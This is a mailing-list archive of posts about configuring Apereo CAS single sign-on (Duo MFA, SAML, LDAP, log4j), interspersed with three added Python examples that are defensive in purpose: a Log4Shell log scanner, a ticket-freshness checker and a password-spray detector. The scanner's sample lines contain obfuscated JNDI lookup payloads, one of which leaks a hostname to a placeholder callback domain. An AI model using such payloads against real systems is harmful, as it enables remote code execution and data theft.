Re: [cas-user] CAS accessibility to people with disabilities

2023-08-04 Thread 'Richard Frovarp' via CAS Community
On Fri, 2023-08-04 at 02:52 -0700, Jean-Paul JORDA wrote: Hi, We use apereo CAS for our applications, but unfortunately the login page is not accessible to people with disabilities. That's a problem for these people of course, and what's more we are bound by law to provide accessible web sites

Re: [cas-user] ERROR CAS 6.1 SAML IDP GOOGLE

2023-07-27 Thread 'Richard Frovarp' via CAS Community
Typically the helpful bit in a long stack like this is at the end Error: Caused by: java.net.MalformedURLException: no protocol: login.unila.ac.id/cas at java.base/java.net.URL.<init>(URL.java:627) at java.base/java.net.URL.<init>(URL.java:523) at

[cas-user] REST attribute resolution and filtering

2023-07-21 Thread 'Richard Frovarp' via CAS Community
I am trying to retrieve one specific attribute from a REST end point. I have it connecting to it. However, I only have one service that should get this attribute, and thus I only need to connect to the REST attribute store for that one service. How do I configure this in my service definition?

[cas-user] Public workstation functionality doesn't work with Duo Universal Prompt

2023-06-13 Thread 'Richard Frovarp' via CAS Community
I have two otherwise identically configured CAS configurations, both on 6.6.6. Both are configured to use Duo, and both of them have the public workstation checkbox in the login form. The only difference between the two is that one uses the iframe Duo integration and one uses the Universal

Re: [cas-user] Re: CAS Client help

2023-03-28 Thread 'Richard Frovarp' via CAS Community
APIs are handled differently from SPAs. You probably need to look at the CAS REST protocol? https://apereo.github.io/cas/6.6.x/protocol/REST-Protocol.html I would put APIs behind an API gateway. Conceptually they are the same thing as CAS + AD, but specifically designed for API calls,

Re: [cas-user] Install CAS on Ubuntu (implement SSO system using OpenLDAP)

2023-03-23 Thread 'Richard Frovarp' via CAS Community
Not sure why that isn't starting up. I launch it differently with a java -jar command. Good resource for getting going: https://fawnoos.com/2022/03/04/cas65-gettingstarted-overlay/ That is for 6.5, but I think everything holds for 6.6. It also has different instructions for launching. On

Re: [cas-user] Duo Universal Prompt behind proxy

2023-03-08 Thread 'Richard Frovarp' via CAS Community
On 3/8/23 12:59, 'Richard Frovarp' via CAS Community wrote: On CAS 6.6.6 and using the Duo Universal Prompt, it is exposing my internal hostname, rather than the load balancer. It's not clear to me why this is happening. It is also not clear to me what the correct configuration options

[cas-user] Duo Universal Prompt behind proxy

2023-03-08 Thread 'Richard Frovarp' via CAS Community
On CAS 6.6.6 and using the Duo Universal Prompt, it is exposing my internal hostname, rather than the load balancer. It's not clear to me why this is happening. It is also not clear to me what the correct configuration options are for a load balanced CAS with respect to hostname / proxy

Re: [cas-user] SAML IdP keys and metadata problems

2023-01-09 Thread 'Richard Frovarp' via CAS Community
location cas thinks is correct. Not sure about the exception. Perhaps it is missing something related to git; path, write permissions, initialized repo, etc. Ray On Fri, 2023-01-06 at 15:42 -0600, 'Richard Frovarp' via CAS Community wrote: Notice: This message was sent from outside the University

[cas-user] SAML IdP keys and metadata problems

2023-01-06 Thread 'Richard Frovarp' via CAS Community
I'm having two different problems related to SAML 2 keys and metadata on 6.6.3. If I have org.apereo.cas:cas-server-support-saml-idp-metadata-git enabled, I get an NPE when trying to access the metadata URL. I have enforced the default false flag to indicate that the IdP metadata shouldn't

Re: [cas-user] Using git on multiple repos

2022-12-27 Thread 'Richard Frovarp' via CAS Community
d. On Fri, Dec 23, 2022 at 5:28 AM 'Richard Frovarp' via CAS Community wrote: That could also work. Thanks. On 12/22/22 07:50, Misagh wrote: Did you mean this? https://apereo.github.io/cas/6.6.x/installation/Configuring-SAML2-DynamicMetadata-Git.html On Thu, Dec 22, 2022 at 4:52 AM 'Richard Fr

Re: [cas-user] Using git on multiple repos

2022-12-22 Thread 'Richard Frovarp' via CAS Community
That could also work. Thanks. On 12/22/22 07:50, Misagh wrote: Did you mean this? https://apereo.github.io/cas/6.6.x/installation/Configuring-SAML2-DynamicMetadata-Git.html On Thu, Dec 22, 2022 at 4:52 AM 'Richard Frovarp' via CAS Community wrote: Is it possible to have CAS use two different

[cas-user] Re: Using git on multiple repos

2022-12-22 Thread 'Richard Frovarp' via CAS Community
I discovered that the git service repository is not recursive. So, I can put the hand maintained metadata in a subdirectory in the repo, and we are good. From: 'Richard Frovarp' via CAS Community Sent: Tuesday, December 20, 2022 2:52:21 PM To: cas-user@apereo.org

[cas-user] Using git on multiple repos

2022-12-21 Thread 'Richard Frovarp' via CAS Community
Is it possible to have CAS use two different repos, with one of them NOT being services in 6.6? I have a repo of all of my hand maintained metadata that isn't in the same repo as the JSON files for service configuration. Thanks, Richard -- - Website: https://apereo.github.io/cas - Gitter

Re: [cas-user] CAS SSL - How to send SSL Certificate Chain?

2022-11-03 Thread 'Richard Frovarp' via CAS Community
, 'Richard Frovarp' via CAS Community wrote: Browsers will insert the intermediate certificates if they know them. So you can't trust the browser. Scanners look for the chain with no prior knowledge, and thus are more reliable in determining if you have everything setup correctly. On 11/3/22 12:47, Ray

Re: [cas-user] CAS SSL - How to send SSL Certificate Chain?

2022-11-03 Thread 'Richard Frovarp' via CAS Community
Browsers will insert the intermediate certificates if they know them. So you can't trust the browser. Scanners look for the chain with no prior knowledge, and thus are more reliable in determining if you have everything setup correctly. On 11/3/22 12:47, Ray Bon wrote: Michael, I have not

[cas-user] Metrics prefix for 6.6?

2022-11-02 Thread 'Richard Frovarp' via CAS Community
Is there a metrics prefix for StatsD (or any of the other ones) that we can provide? Generally we run one StatsD for multiple systems, and it not using a prefix to group it together is going to make things complicated / impossible. There used to be one, but I can't seem to find anything in the

Re: [cas-user] Re: Older documentation is no longer available

2022-11-01 Thread 'Richard Frovarp' via CAS Community
On Tue, 2022-11-01 at 09:06 -0400, Mark H. Wood wrote: > On Mon, Oct 31, 2022 at 03:25:12PM -0700, Benjamin Bini wrote: > > Which project removes documentation as a way to encourage people to > > upgrade? > > What is the next step? Removing the code from GitHub and removing > > artifacts > > from

Re: [cas-user] renew=true, risk of bypassing?

2022-08-16 Thread 'Richard Frovarp' via CAS Community
Part of the response metadata coming back is if the authentication is from a new login. I think it will also tell you what time the auth happened. Don't trust the user provided data, validate that what CAS is telling you matches your security requirement. If it doesn't, don't let them pass.

Re: [cas-user] CAS 6.5 w/ Duo MFA, was MFA actually used?

2022-07-29 Thread 'Richard Frovarp' via CAS Community
How are you triggering MFA / Duo? You likely only want to trigger Duo on a local attribute and setup the integration to force Duo always. If you are leaving it up to Duo to decide if the user is enrolled and bypass if not, the old Duo Web integration couldn't tell you what happen, just that

Re: [cas-user] ideas for persistence login session

2022-07-28 Thread 'Richard Frovarp' via CAS Community
Amazon stores a decent amount of info at the account layer. Different application sessions across different devices share cart. But the solution for this is to do it at the application layer. Extend the session out there. Then at the security layer, it should have the functionality to know

Re: [cas-user] ideas for persistence login session

2022-07-27 Thread 'Richard Frovarp' via CAS Community
I would change the application and not do it via CAS. Changing the application session timeout to what they want. Because otherwise it will do a SSO session again, which will interrupt anything the end user is trying to do with the browser open for the past two days. So anything done via CAS

Re: [cas-user] Re: Migrating services from version 5 to 6

2022-03-31 Thread 'Richard Frovarp' via CAS Community
The tables in the post are for the service registry. If you don't migrate those, you will have to reconfigure from scratch. I do not know what the plans are for the project with respect to the service registry. It's changed a bit between versions, and usually seems like a pain. We made the

Re: [cas-user] MFA with Duo - A Lot Of Failures

2022-02-17 Thread 'Richard Frovarp' via CAS Community
Looks like the clock on your server isn't correct? 2022-02-17 20:14:10,479 ERROR [org.apereo.cas.adaptors.duo.authn.DuoSecurityAuthenticationHandler] - Caused by: com.auth0.jwt.exceptions.InvalidClaimException: The Token can't be used before Thu Feb 17 20:15:11 UTC 2022. I don't know about

Re: [cas-user] log4j2 vulnerability

2021-12-12 Thread 'Richard Frovarp' via CAS Community
Newer version of the JDK are still affected. The newer JDK versions stop JNDI from running remote code, it doesn't stop JNDI lookup. An attacker can still exfil data through the DNS lookup. Also, there are other paths to exploit with this attack. It was first found via JNDI LDAP to execute
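The point in the reply above is that the JDK-side mitigation only blocks remote class loading; the lookup itself still runs, so a `${jndi:dns://...}` or `${jndi:ldap://...}` string in a logged field still produces an outbound resolution. The following is an added example, not code from the thread or from the CAS project: a small Python scanner that de-obfuscates the nesting tricks (`${lower:j}`, `${::-j}`, `${env:NOPE:-n}`) and reports the URI scheme of every jndi lookup it finds in access-log lines. The log lines are constructed for the example and the callback hostname is a placeholder. It is a triage aid for finding who probed you, not a substitute for upgrading Log4j.

```python
import re

# Obfuscation layers commonly wrapped around the jndi lookup:
#   ${lower:J}, ${upper:n}       case-mapping lookups
#   ${::-j}, ${env:NOPE:-n}      default-value syntax: the lookup fails, the default survives
LOWER_UPPER = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=8):
    """Peel nested lower/upper/default lookups, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        new = LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text):
    """URI schemes of every jndi lookup in text after de-obfuscation ("ldap", "rmi", "dns", ...)."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalize(text))]


def scan_lines(lines):
    """Return (line_no, schemes, line) for each line that carries a jndi lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        schemes = find_jndi(line)
        if schemes:
            hits.append((n, schemes, line))
    return hits


# Constructed access-log lines (not real traffic); the User-Agent is the usual carrier.
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.4 - - "GET /cas/login HTTP/1.1" 200 "${jndi:ldap://198.51.100.4:1389/a}"',
    '198.51.100.4 - - "GET /cas/login HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.4/b}"',
    '198.51.100.5 - - "GET /cas/login HTTP/1.1" 200 '
    '"${${::-j}${env:NOPE:-n}${::-d}${::-i}:${::-d}ns://${hostName}.callback.example}"',
    '203.0.113.9 - - "GET /cas/login HTTP/1.1" 200 "curl/7.81 ${date:yyyy}"',
]

if __name__ == "__main__":
    for n, schemes, line in scan_lines(SAMPLE_ACCESS_LOG):
        print(f"line {n}: jndi via {','.join(schemes)} -> {normalize(line)}")
```

The fourth sample line is the case the reply is warning about: after the default-value lookups collapse it reads `${jndi:dns://${hostName}...}`, which never loads a class and so is untouched by `trustURLCodebase=false`, yet still leaks the inner lookup's value in a DNS query. Feed the scanner your reverse-proxy and CAS access logs around the disclosure date; anything it flags from before your Log4j upgrade deserves a look at what that source did next.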

Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community
to "true" in the log4j2.xml config file might do the trick. I'm guessing we'd do that somewhere here at the top? /etc/cas/logs On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <cas-user@apereo.org> wrote: Using a ne

Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community
Using a new enough version of the JDK might also alleviate it? The other option is to throw the config option at the JDK to stop it from happening. That would seem to be easiest. On 12/10/21 12:36 PM, King, Robert wrote: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 Has

Re: [cas-user] Clarification on ADFS/CAS integration possibilities

2021-10-21 Thread 'Richard Frovarp' via CAS Community
"I understand you can make CAS use ADFS for backend authentication, or vise-a-versa, but i'm not sure that's exactly what i'm asking here... or is it?" Yes, that is what you are asking. Otherwise they are two independent applications that know nothing about the state of one another, even

[cas-user] Re: Trimming username for attribute resolution

2021-09-01 Thread 'Richard Frovarp' via CAS Community
The issue is that this happens before the service release policy can trigger. For some reason it is going against AD with 'richard.frovarp ', which results in a failed AD lookup. So it can't even get the extra attributes to return. So it appears that the result of the principal transformation

[cas-user] Trimming username for attribute resolution

2021-08-31 Thread 'Richard Frovarp' via CAS Community
What's the way to do that? I thought I figured that out, but it turns out I haven't. I think one of my systems is accomplishing it via JS in the page. Another CAS instance for a different org doesn't have that JS. Random trailing spaces is causing attribute resolution to fail. Somehow

Re: [cas-user] Re: CAS vs Spring Security PLUS CAS

2021-07-09 Thread 'Richard Frovarp' via CAS Community
Fernando's message below is great advice. The version of the CAS server isn't going to matter too terribly much. It will depend on what protocol you are planning to use against CAS. I'm going to guess CAS Protocol v3, which gives you everything you need. You are going to want a security

Re: [cas-user] Re: Spring Security integration doubts (With JDBC)

2021-06-21 Thread 'Richard Frovarp' via CAS Community
CAS can do multifactor. It can also release a bunch of attributes about how the authentication went if you use the CAS 3 protocol. The service directing the individual to CAS can also request that a fresh login is used. Combined together, the service can be assured (so long as they trust the
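Both this reply and the renew=true reply above (2022-08-16) make the same recommendation: do not take the browser's word for how the user logged in, read what CAS asserts in the CAS protocol v3 validation response and refuse the ticket if it does not meet the service's requirement. The block below is an added example, not code from either post or from the CAS project. It parses a `/p3/serviceValidate` body, using the `authenticationDate`, `isFromNewLogin` and `longTermAuthenticationRequestTokenUsed` attributes defined by the protocol, and enforces a maximum authentication age. The XML bodies, the user `jdoe` and the fixed `SAMPLE_NOW` clock are constructed for the example.

```python
import datetime as dt
import re
import xml.etree.ElementTree as ET

# Namespace of the CAS protocol's serviceResponse document.
CAS_NS = {"cas": "http://www.yale.edu/tp/cas"}


class CasValidationError(Exception):
    """The validation response does not satisfy this service's policy."""


def parse_service_response(xml_text):
    """Turn a /p3/serviceValidate body into {"user": ..., "attributes": {name: [values]}}.

    Raises CasValidationError on an <cas:authenticationFailure> body.
    """
    root = ET.fromstring(xml_text)
    failure = root.find("cas:authenticationFailure", CAS_NS)
    if failure is not None:
        raise CasValidationError(f"{failure.get('code')}: {(failure.text or '').strip()}")
    success = root.find("cas:authenticationSuccess", CAS_NS)
    if success is None:
        raise CasValidationError("response carries neither a success nor a failure element")
    attrs = {}
    attr_block = success.find("cas:attributes", CAS_NS)
    if attr_block is not None:
        for child in attr_block:
            name = child.tag.rsplit("}", 1)[-1]          # drop the {namespace} prefix
            attrs.setdefault(name, []).append((child.text or "").strip())
    return {"user": success.findtext("cas:user", namespaces=CAS_NS), "attributes": attrs}


def parse_cas_timestamp(value):
    """CAS writes ISO 8601 with a Z suffix and may use more than six fractional digits."""
    value = re.sub(r"(\.\d{6})\d+", r"\1", value.strip())   # fromisoformat wants <= 6
    if value.endswith("Z"):
        value = value[:-1] + "+00:00"
    return dt.datetime.fromisoformat(value)


def assert_fresh_login(parsed, max_age_seconds, now=None, allow_remember_me=False):
    """Check CAS's own assertion of how the login happened instead of trusting the browser.

    Returns the authentication age in seconds, or raises CasValidationError.
    """
    attrs = parsed["attributes"]
    now = now or dt.datetime.now(dt.timezone.utc)

    def flag(name):
        return attrs.get(name, [""])[0].lower()

    if flag("isFromNewLogin") != "true":
        raise CasValidationError("ticket came from an existing SSO session, not a fresh login")
    if not allow_remember_me and flag("longTermAuthenticationRequestTokenUsed") == "true":
        raise CasValidationError("remember-me session; no interactive credential was presented")
    stamp = attrs.get("authenticationDate", [""])[0]
    if not stamp:
        raise CasValidationError("authenticationDate attribute missing; cannot judge freshness")
    age = (now - parse_cas_timestamp(stamp)).total_seconds()
    if age < -60 or age > max_age_seconds:          # tolerate a minute of clock skew
        raise CasValidationError(f"authentication is {age:.0f}s old; limit is {max_age_seconds}s")
    return age


# Constructed sample responses (not captured from a real CAS server).
FRESH_RESPONSE = """<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
  <cas:authenticationSuccess>
    <cas:user>jdoe</cas:user>
    <cas:attributes>
      <cas:authenticationDate>2022-08-16T14:03:11.123456789Z</cas:authenticationDate>
      <cas:longTermAuthenticationRequestTokenUsed>false</cas:longTermAuthenticationRequestTokenUsed>
      <cas:isFromNewLogin>true</cas:isFromNewLogin>
      <cas:mail>jdoe@example.edu</cas:mail>
    </cas:attributes>
  </cas:authenticationSuccess>
</cas:serviceResponse>"""
SSO_RESPONSE = FRESH_RESPONSE.replace("<cas:isFromNewLogin>true", "<cas:isFromNewLogin>false")
FAILED_RESPONSE = """<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
  <cas:authenticationFailure code='INVALID_TICKET'>Ticket not recognized</cas:authenticationFailure>
</cas:serviceResponse>"""
# "Now" for the demo, 30 seconds after the sample authenticationDate.
SAMPLE_NOW = dt.datetime(2022, 8, 16, 14, 3, 41, tzinfo=dt.timezone.utc)

if __name__ == "__main__":
    for label, body in [("fresh", FRESH_RESPONSE), ("sso", SSO_RESPONSE), ("failed", FAILED_RESPONSE)]:
        try:
            age = assert_fresh_login(parse_service_response(body), 120, now=SAMPLE_NOW)
            print(f"{label}: accepted, authenticated {age:.1f}s ago")
        except CasValidationError as err:
            print(f"{label}: rejected ({err})")
```

The response is something the service fetched itself from CAS over TLS, so parsing it with the standard library is acceptable here; the decision to let the user through rests only on that document, never on a `renew` or timestamp parameter the browser carried in the URL. If a client library already validates the ticket for you, apply the same checks to the attribute map it hands back.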

Re: [cas-user] CAS Authentication issue

2021-05-26 Thread 'Richard Frovarp' via CAS Community
Looks like it can't find the table?? Are there any tables in your DB? Is your DB named vantage? You'll need to refer to the docs on how to get it to create the tables if they aren't there. If they are there in that DB, I'm not sure. You are on an ancient version of CAS. If this is setting it up

Re: [cas-user] Re: Guide to Deploying CAS 6 - with Ansible, MFA, and Delegated authentication

2021-05-19 Thread 'Richard Frovarp' via CAS Community
Yes, very nicely done. I too will find the Azure bit helpful when I spin up a social CAS instance in the future. Richard On Thu, 2021-05-13 at 21:59 -0700, Andy Ng wrote: Hi Paul, Thanks for the contribution! We soon also need to setup delegate auth to Azure, so that section is going to be

Re: [cas-user] Failed Login Attempts

2021-05-18 Thread 'Richard Frovarp' via CAS Community
Don't get me wrong, throttling is definitely good. The thing you want to watch out for is when unexpected attempts succeed. So one bit of strange behavior to be on the lookout for is an authentication that triggers MFA, but the MFA success never happens. It will depend on your MFA solution.

Re: [cas-user] Failed Login Attempts

2021-05-18 Thread 'Richard Frovarp' via CAS Community
Adding user won't catch a spray over different usernames. I just use rate throttling as well. And yeah, if they go down to 1 per second, you'll never catch them with the throttle. You also won't catch them if they come at you with hundreds of IPs. On Mon, 2021-05-17 at 16:40 +, Ray Bon
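The two replies above describe three things a plain per-IP or per-user throttle misses: a spray that touches each username once, a spray spread across many source addresses, and a password that was correct but whose MFA prompt was never completed. The following is an added example, not code from the thread or from CAS: it runs those three checks over a constructed stream of authentication events (the event kinds `fail`, `success`, `mfa_prompt`, `mfa_ok`, the usernames and the addresses are all made up for the example). Sources are aggregated by /24, which clusters neighbouring attacker hosts but, as the reply says, still will not catch hundreds of unrelated IPs; for that the same distinct-username count has to be kept globally.

```python
import ipaddress
from collections import defaultdict, namedtuple

# One authentication event as a SIEM would hand it to us.
# kind is one of: fail, success, mfa_prompt, mfa_ok
Event = namedtuple("Event", "ts user ip kind")


def subnet24(ip):
    """Aggregate IPv4 sources by /24 so a spray from neighbouring hosts still clusters."""
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


def max_failures_per_user(events):
    """The per-username counter a simple throttle keeps; a one-guess-per-user spray never trips it."""
    counts = defaultdict(int)
    for e in events:
        if e.kind == "fail":
            counts[e.user] += 1
    return max(counts.values(), default=0)


def distinct_users_in_window(fails, window):
    """Most distinct usernames failed against within any `window` seconds (fails sorted by ts)."""
    best, start = 0, 0
    for i, (ts, _) in enumerate(fails):
        while fails[start][0] < ts - window:
            start += 1
        best = max(best, len({u for _, u in fails[start:i + 1]}))
    return best


def spray_sources(events, window=300, min_users=10):
    """Return {subnet: distinct_users} for sources guessing across many accounts, however slowly."""
    by_net = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        if e.kind == "fail":
            by_net[subnet24(e.ip)].append((e.ts, e.user))
    result = {}
    for net, fails in by_net.items():
        n = distinct_users_in_window(fails, window)
        if n >= min_users:
            result[net] = n
    return result


def unfinished_mfa(events, now, timeout=120):
    """Password accepted, MFA prompted, never completed: the pattern worth paging on."""
    pending = {}
    for e in sorted(events, key=lambda e: e.ts):
        if e.kind == "mfa_prompt":
            pending[e.user] = e
        elif e.kind == "mfa_ok":
            pending.pop(e.user, None)
    return [e for e in pending.values() if now - e.ts > timeout]


# Constructed sample stream; timestamps are seconds.
EVENTS = []
for i in range(40):          # one IP, one guess per account, one guess per second
    EVENTS.append(Event(1000 + i, f"user{i:03d}", "198.51.100.7", "fail"))
for i in range(20):          # twenty IPs in one /24, one guess each, spread over a minute
    EVENTS.append(Event(2000 + 3 * i, f"staff{i:02d}", f"203.0.113.{10 + i}", "fail"))
EVENTS += [
    Event(3000, "alice", "192.0.2.10", "fail"),        # fat-fingered twice, then succeeded
    Event(3010, "alice", "192.0.2.10", "fail"),
    Event(3020, "alice", "192.0.2.10", "success"),
    Event(3021, "alice", "192.0.2.10", "mfa_prompt"),
    Event(3030, "alice", "192.0.2.10", "mfa_ok"),
    Event(3100, "bob", "203.0.113.77", "success"),     # right password from the spraying /24 ...
    Event(3101, "bob", "203.0.113.77", "mfa_prompt"),  # ... and the push was never approved
]

if __name__ == "__main__":
    print("max failures for any single user:", max_failures_per_user(EVENTS))
    print("spray sources:", spray_sources(EVENTS, window=60, min_users=10))
    for e in unfinished_mfa(EVENTS, now=3300):
        print(f"MFA never completed: {e.user} from {e.ip} at t={e.ts}")
```

With this data the per-user counter peaks at 2 (alice's typos) while both spraying subnets are reported with 40 and 20 distinct usernames, and bob's incomplete MFA push from the same /24 is the event that should be investigated first.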

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

2021-04-19 Thread 'Richard Frovarp' via CAS Community
614 DEBUG [org.apereo.cas.web.FlowExecutionExceptionResolver] - org.apereo.cas.support.saml.SamlException: Signing credentials for validation could not be resolved based on the provided signature Keith Alston Regent University IT Department keit...@regent.edu 757.619.3421 ____ From: 'Richar

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

2021-04-19 Thread 'Richard Frovarp' via CAS Community
: { "@class" : "java.util.TreeMap", "ExtensionAttribute1" : "Email", "givenname" : "FirstName", "sn" : "LastName" } } } Keith Alston Regent University IT Department keit...@regent

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

2021-04-19 Thread 'Richard Frovarp' via CAS Community
Since I saw someone create the URL by hand the other day, I'm going to ask the simple question: is the request hitting the HTTP-POST binding location? POST and Redirect are two different URLs in CAS (and I'm guessing most IdPs). I've never had to do anything different to handle the two

Re: [cas-user] No registered service found/Freshworks SAML2/ CAS 5.3

2021-04-12 Thread 'Richard Frovarp' via CAS Community
Or rather serviceId : instead of the regex you have there. On Mon, 2021-04-12 at 18:50 +, 'Richard Frovarp' via CAS Community wrote: Don't do a regex for the serviceId for SAML2. Do the entityId instead. On Mon, 2021-04-12 at 18:46 +, Keith Alston (Staff) wrote: Any ideas on what

Re: [cas-user] No registered service found/Freshworks SAML2/ CAS 5.3

2021-04-12 Thread 'Richard Frovarp' via CAS Community
Don't do a regex for the serviceId for SAML2. Do the entityId instead. On Mon, 2021-04-12 at 18:46 +, Keith Alston (Staff) wrote: Any ideas on what might be going on here? I get the "Application Not Authorized to Use CAS" page when redirected to CAS. 2021-04-12 14:21:32,474 WARN

Re: [cas-user] CAS 5.2.9 Authenticating LDAP users outside baseDn

2021-03-31 Thread 'Richard Frovarp' via CAS Community
My guess is that the bind user is going to ignore the base DN as it happens before the search is done. As for the rest, it likely should follow the base DN. You may have something effectively double defined there that is causing it to work outside. I'm not sure what the dnFormat parameter does.

Re: [cas-user] CAS 6.3 + SAML

2021-03-22 Thread 'Richard Frovarp' via CAS Community
If I'm understanding you correctly, I've never done it that way. You are saying that you have an attribute already setup called sAMAccountName right? And you want to release it to this system as domain\sAMAcountName as userID? I've always done such a thing via Groovy attribute return with

Re: [cas-user] CAS 6.3 + SAML

2021-03-17 Thread 'Richard Frovarp' via CAS Community
The IdP automatically generates metadata. And the correct endpoints are listed on this page, including the metadata endpoint: https://apereo.github.io/cas/6.3.x/installation/Configuring-SAML2-Authentication.html Usually with SAML you provide the SP with a copy of your metadata, ideally loaded

Re: [cas-user] CAS 6.3 + SAML

2021-03-17 Thread 'Richard Frovarp' via CAS Community
Did you provide the app your IdP generated metadata or provide the SP with the information in a different method? As that's the wrong end point for the SP to be sending you to: https://apereo.github.io/cas/6.3.x/installation/Configuring-SAML2-Authentication.html On Wed, 2021-03-17 at 06:21

Re: [cas-user] InCommon and NIH changes

2021-03-11 Thread 'Richard Frovarp' via CAS Community
I'm running my InCommon membership through Shibboleth, so I'm not looking for a CAS solution. However, here is what I know: 1) R is documented as you point out. If you are going to provide REFEDS R to REFEDS R SPs, you probably want to go into the InCommon Federation Manager and assert that

Re: [cas-user] Sample SAML2 service definition for Google Apps?

2021-03-10 Thread 'Richard Frovarp' via CAS Community
-0800, Mike Osterman wrote: Thanks, Richard! On Wed, Mar 10, 2021 at 2:40 PM 'Richard Frovarp' via CAS Community <cas-user@apereo.org> wrote: Get a test instance. It's pretty easy to do. Takes a little bit, but easy to do. You really only need one or two users in it to test

Re: [cas-user] Sample SAML2 service definition for Google Apps?

2021-03-10 Thread 'Richard Frovarp' via CAS Community
Get a test instance. It's pretty easy to do. Takes a little bit, but easy to do. You really only need one or two users in it to test anyway. There is a previous post on this list on how to do it the new way. I have internal documentation that I can turn into external documentation tonight and

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

2021-03-05 Thread 'Richard Frovarp' via CAS Community
, 'Richard Frovarp' via CAS Community wrote: > It's doing something with Single Logout. Turn it off / block it, or > something: > > https://community.canvaslms.com/t5/Integration-Documents/Configuring-CAS-and-Canvas-Authentication/ta-p/387390 > > Look at the end for "User

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

2021-03-05 Thread 'Richard Frovarp' via CAS Community
It's doing something with Single Logout. Turn it off / block it, or something: https://community.canvaslms.com/t5/Integration-Documents/Configuring-CAS-and-Canvas-Authentication/ta-p/387390 Look at the end for "User is randomly logged out of Canvas" On Fri, 2021-03-05 at 12:41 -0800, Mike

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

2021-03-05 Thread 'Richard Frovarp' via CAS Community
On Fri, 2021-03-05 at 11:20 -0800, Bill Scully wrote: Does single logout trigger upon CAS session expiration? I would expect not, but maybe there's a setting to flip that? Or maybe something else is triggering single logout at two hours, and that is triggering Canvas? According to Instructure

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

2021-03-05 Thread 'Richard Frovarp' via CAS Community
Does single logout trigger upon CAS session expiration? I would expect not, but maybe there's a setting to flip that? Or maybe something else is triggering single logout at two hours, and that is triggering Canvas? On Fri, 2021-03-05 at 22:49 +0400, Misagh wrote: > > Instructure's Canvas (LMS)

Re: [cas-user] Unable to get UID attribute in client side

2021-02-16 Thread 'Richard Frovarp' via CAS Community
I don't remember the fine specifics of the logs well enough to know. It's possible that both are at fault? Make sure you are listing attributes to lookup in your ldap attribute repository configuration. If they aren't there, that'll be problem one. The other thing is that by default the CAS 2

Re: [cas-user] Question about using CAS with LDAP...?

2021-02-12 Thread 'Richard Frovarp' via CAS Community
configuration. I'm guessing you can't anonymous bind to LDAP from HTTPD. On Fri, 2021-02-12 at 15:10 +, 'Richard Frovarp' via CAS Community wrote: I wouldn't mix the two methods. There's probably a way to make that work, but that's an HTTPD question, not a CAS question. You can have CAS

Re: [cas-user] Question about using CAS with LDAP...?

2021-02-12 Thread 'Richard Frovarp' via CAS Community
I wouldn't mix the two methods. There's probably a way to make that work, but that's an HTTPD question, not a CAS question. You can have CAS authenticate against LDAP from the CAS IdP. That can either then return the list of attributes to have mod_auth_cas filter on. Or you can have the IdP do

Re: [EXTERNAL SENDER] Re: [cas-user] CAS 5.0.x newer ldaptive?

2021-02-05 Thread 'Richard Frovarp' via CAS Community
at 5:20 AM 'Richard Frovarp' via CAS Community <cas-user@apereo.org> wrote: Sorry, you don't need it in 5.3 as that one is default. So I didn't see that in my dependencies. You'll need the ldaptive dependency for that. You'll want to match version to the other ldaptive version you h

Re: [EXTERNAL SENDER] Re: [cas-user] CAS 5.0.x newer ldaptive?

2021-01-29 Thread 'Richard Frovarp' via CAS Community
figuration-Properties-Common.html#ldap-connection-settings but this property is also listed in the 5.0.x properties <https://apereo.github.io/cas/5.0.x/installation/Configuration-Properties.html> On Thu, Jan 28, 2021 at 11:18 AM 'Richard Frovarp' via CAS Community <cas-user@apereo.org>

Re: [cas-user] CAS 5.0.x newer ldaptive?

2021-01-28 Thread 'Richard Frovarp' via CAS Community
I'm guessing that it just doesn't exist anymore. Browsing from https://repo.spring.io/snapshot/ They don't have anything for Duo that is obvious. It was a SNAPSHOT dependency, and thus shouldn't have been used in anything released. I see in my pom: org.apereo.cas

Re: [cas-user] CAS 5.0.x newer ldaptive?

2021-01-28 Thread 'Richard Frovarp' via CAS Community
You have to do overlay exclusions. Which for me looks like. Obviously close the XML out as appropriate. I have further build plugins. maven-war-plugin 2.6 false false false ${project.build.directory}/war/work/org.apereo.cas/cas-server-webapp/META-INF/MANIFEST.MF org.apereo.cas

Re: [cas-user] CAS 5.0.x newer ldaptive?

2021-01-27 Thread 'Richard Frovarp' via CAS Community
For the Duo jar, you should put them in your own local repo? Or maybe the cache dir? I know that by default it feels like you have to hunt through a variety of external repos to find that dependency. I run a local Nexus install for us so I only have to hunt down once. For the LDAP problems, I

Re: [cas-user] 3.5.2 Oracle DB compatibility

2021-01-22 Thread 'Richard Frovarp' via CAS Community
